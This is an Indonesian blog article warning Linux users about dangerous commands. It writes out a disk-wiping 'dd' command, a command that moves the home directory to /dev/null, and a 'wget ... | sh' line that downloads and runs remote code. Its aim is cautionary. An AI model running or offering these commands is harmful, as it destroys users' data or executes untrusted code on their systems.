Article Top Ad

dd if=/dev/random of=/dev/sda

Perintah dd if=/dev/random of=/dev/sda berfungsi untuk membuat file sampah di hardisk. Perintah dd sebenarnya untuk melakukan copy berserta file sistemnya. Perintah ini memiliki dua parameter yang umum digunakan, if (input stream) dan of (output stream).

  1. if yaitu sumber yang akan di copy
  2. of yaitu tujuannya
  3. /dev/random yaitu file acak
  4. /dev/sda yaitu hardisk yang di gunakan

mv ~ /dev/null

Perintah mv ~ /dev/null berfungsi untuk kirim direktori home ke black hole. Lokasi /dev/null dianggap sebagai lokasi berbahaya. Lokasi ini dijuluki Black Hole, karena apapun yang dikirim ke sana akan menghilang.

  1. mv = Pindah file (cut)
  2. /dev/null = lokasi black hole
  3. Karakter tidle ~ adalah simbol lokasi home

wget http://example.com/something -O – | sh

Perintah wget http://example.com/something -O – | sh berfungsi jika kamu mendownload maka langsung ke install atau langsung di eksekusi.

Article Inline Ad

Baca Juga : Jika Kamu Ingin Menjadi Hacker, Belajarlah Algoritma Terlebih Dahulu!

Demikianlah artikel tentang “Jangan Sekali-kali Menjalankan Perintah ini, Jika Linux Kamu Tidak Mau Rusak, Di Karenakan Ini Perintah Sangat Bahaya!“. Semoga artikel ini bisa bermanfaat dan jangan lupa untuk share artikel ini agar semakin banyak orang orang yang mengetahui dan membaca karena dengan membaca kita jadi tahu.

Jika ada kesalahan kata BaHangat.Com minta maaf, dan semoga artikel ini berguna, bermanfaat. Terimakasih sudah membaca dan sudah mampir di BeHangat.Com sampai jumpa di pertemuan berikutnya.

Terima Kasih.. ^_^ Wassalamu’alaikum Wr. Wb.

Article Bottom Ad

LEAVE A REPLY

Please enter your comment!
Please enter your name here

eighteen − thirteen =